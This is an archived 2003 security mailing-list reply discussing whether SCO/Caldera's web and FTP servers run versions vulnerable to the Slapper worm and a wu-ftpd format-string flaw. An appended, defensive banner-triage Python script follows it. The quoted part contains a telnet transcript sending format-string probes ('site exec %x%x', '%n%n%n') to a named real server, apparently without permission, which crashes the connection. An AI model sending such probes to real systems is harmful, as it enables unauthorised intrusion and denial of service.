Message-ID: <000e01c36697$563e3c80$2b02a8c0@dcopley>
From: dcopley at eeye.com (Drew Copley)
Subject: SCO Web Site Vulnerable to Slapper?


> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com 
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of KF
> Sent: Tuesday, August 19, 2003 9:21 AM
> To: Jeremiah Cornelius
> Cc: Gherkin McDonalds; full-disclosure@...ts.netsys.com; 
> security@...dera.com; security@....com
> Subject: Re: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
> 
> 
> **** CALDERA ARE YOU PAYING ATTENTION **** WAKE UP ****
> 
> (normally I would not do this...) I am under the impression that either
> they probably don't care about their security or they are ignorant... I
> reported this (see below) to them SEVERAL times... they use a vulnerable
> version of their own ftpd on their ftp server... can you say trojaned
> distribution site? They probably have not patched it because no one has
> produced a public exploit... they DO have a patch available however.
> 
> > telnet ftpput.caldera.com 21
> > Trying 216.250.128.33...
> > Connected to ftpput.caldera.com.
> > Escape character is '^]'.
> > 220 artemis FTP server (Version 2.1WU(1)) ready.
> > user anonymous
> > 331 Guest login ok, send e-mail address as password.
> > pass err@
> > 230-Welcome to Caldera's FTP Archive Site
> > 230-
> ...
> > 230 Guest login ok, access restrictions apply.
> > site exec %x%x
> > 200-d2
> > 200  (end of '%x%x')
> > site exec %n%n%n
> > Connection closed by foreign host.
> 
> 
> -KF
> 
> 
> -------------------------------------------------
> subject: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
> integerdotonefourfivenine@...oo.com wrote:
> 
> They seem to be running Apache/1.3.14 (Unix)
> mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux,
> which, if I have my facts straight, is vulnerable to 
> <URL:http://www.cert.org/advisories/CA-2002-27.html>.
> 
> Am I correct?

Unfortunately, the version number reported is not always accurate. Very
often [or too often] admins will recompile customized fixes of their
software and not bother with upgrading the version number.

Some have even recommended this kind of tactic as a security measure, to
throw people off. However, it makes remote checking - automated checking
- of systems by administrators more difficult, and depending on the
issue, potentially impossible. With plain text protocols it can be
extremely difficult to ascertain whether or not they have a fix for a
security issue unless they have upgraded their version number or one is
willing to crash one's server with a live test.

With binary protocols and major upgrades there tends to be more of a
chance that one can do a non-intrusive check that does not require a
crash and does not require version numbers.

This said, it would be illegal to actually test their site, so let them
handle the hassle. It is unprofessional and rude of them not to respond
about this concern, but that and telling people is all you can do.
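
An added example, not part of the original message or of any tool it mentions: a banner triage for an administrator auditing their own servers, which never reports "vulnerable" from the version string alone because a backported fix leaves the banner unchanged. The function names, the verdict strings, the `backport_confirmed` flag and the `0.9.6e` threshold in the demo are assumptions; take the real first-fixed release from the vendor advisory.

```python
import re

# Version shape handled here: dotted numbers plus an optional letter suffix,
# e.g. "0.9.6" or "0.9.6e". Pre-release tags such as "-RC" are ignored.
VER = r"(\d+(?:\.\d+)*)([a-z]?)"
TOKEN = re.compile(r"([A-Za-z_]+)/" + VER)


def version_key(nums, letter):
    """Sortable key: numeric tuple first, then letter ('' sorts before 'a')."""
    return (tuple(int(n) for n in nums.split(".")), letter)


def parse_banner(banner):
    """Map each product/version token of a Server header to its version key."""
    return {name.lower(): version_key(nums, letter)
            for name, nums, letter in TOKEN.findall(banner)}


def triage(banner, product, first_fixed, backport_confirmed=False):
    """Classify what the banner can and cannot tell us about one product.

    first_fixed        -- first release containing the fix (from the advisory)
    backport_confirmed -- hypothetical flag: True when the host's own package
                          changelog shows the fix was applied without a bump
    """
    fixed = version_key(*re.fullmatch(VER, first_fixed).groups())
    seen = parse_banner(banner).get(product.lower())
    if seen is None:
        return "unknown"            # banner suppressed or product absent
    if seen >= fixed:
        return "likely-fixed"       # still only a claim made by the banner
    if backport_confirmed:
        return "fixed-by-backport"  # stale version string, patched build
    return "needs-host-check"       # old banner: confirm on the host itself


if __name__ == "__main__":
    # Banner string as quoted in the thread above.
    banner = "Apache/1.3.14 (Unix) mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC"
    # "0.9.6e" is an assumed threshold for this demo; check the advisory.
    print(triage(banner, "OpenSSL", "0.9.6e"))
    print(triage(banner, "OpenSSL", "0.9.6e", backport_confirmed=True))
```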

